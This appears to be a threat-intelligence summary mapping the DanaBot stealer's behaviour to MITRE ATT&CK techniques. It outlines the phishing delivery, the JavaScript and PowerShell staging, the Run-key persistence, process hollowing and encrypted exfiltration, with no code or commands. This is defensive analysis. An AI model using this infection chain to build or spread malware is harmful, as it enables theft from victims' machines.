DanaBot Malware Analysis | DataBot Stealer | Emerging Malware

MITRE Techniques

• [T1592] Gather Victim Host Information – Enumerates the compromised system for victim and system profiling. “Enumerates the compromised system for victim and system profiling.”
• [T1566] Phishing – A malevolent attachment serves as the primary vector for downloading and executing the payload within these emails; DanaBot distribution includes phishing campaigns. “The deployment of DanaBot stealer… employing advanced phishing campaigns… A malevolent attachment serves as the primary vector for downloading and executing the payload within these emails.”
• [T1059.001] PowerShell – PowerShell is used to download a second-stage malware after CMD triggers it. “The Windows Command Shell (CMD), subsequently initiating PowerShell to download a second-stage malware.”
• [T1059.003] Windows Command Shell – Windows Command Shell is used to initiate the sequence that leads to PowerShell download. “The Windows Command Shell (CMD), subsequently initiating PowerShell to download a second-stage malware.”
• [T1059.007] JavaScript – The first stage malware is a JavaScript file. “The first stage malware is a JavaScript file.”
• [T1204.002] Malicious File – The dropped payload includes a 32-bit Windows executable TemprmT88.exe downloaded to the user’s AppData path. “downloads an executable TemprmT88.exe in the C:UsersUSERAppDataLocal directory of the current user.”
• [T1547.001] Registry Run Keys / Startup Folder – Persistence via startup execution registry entry. “persistence, malware adds itself to the “ComputerHKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun” registry and runs as startup program at every system restart.”
• [T1055.012] Process Hollowing – The analysis references RunPE (Process hollowing) to execute shellcode within a suspended process. “shellcode… and resumes the execution” (Process Hollowing).
• [T1218.011] Rundll32 – Uses rundll32 to invoke shell32.dll with pythonw.exe as a parameter. “Next, it triggers rundll32.exe, which subsequently executes shell32.dll with pythonw.exe as a parameter.”
• [T1104] Multi-Stage Channels – The malware uses a multi-stage payload delivery chain across distinct sources. “multi-stage payloads from diverse sources.”
• [T1573] Encrypted Channel – Exfiltration occurs over an encrypted channel. “exfiltrate the collected data… over encrypted (SSLv2) connection.”
• [T1071.001] Web Protocols – C2 and data transfer leverage web protocols (Discord CDN, FTP). “Web Protocols” (Discord CDN and FTP usage cited in the article).
• [T1020] Automated Exfiltration – Data is exfiltrated automatically from the infected host. “Exfiltrate the stolen data to servers controlled by the threat actor over encrypted channel.”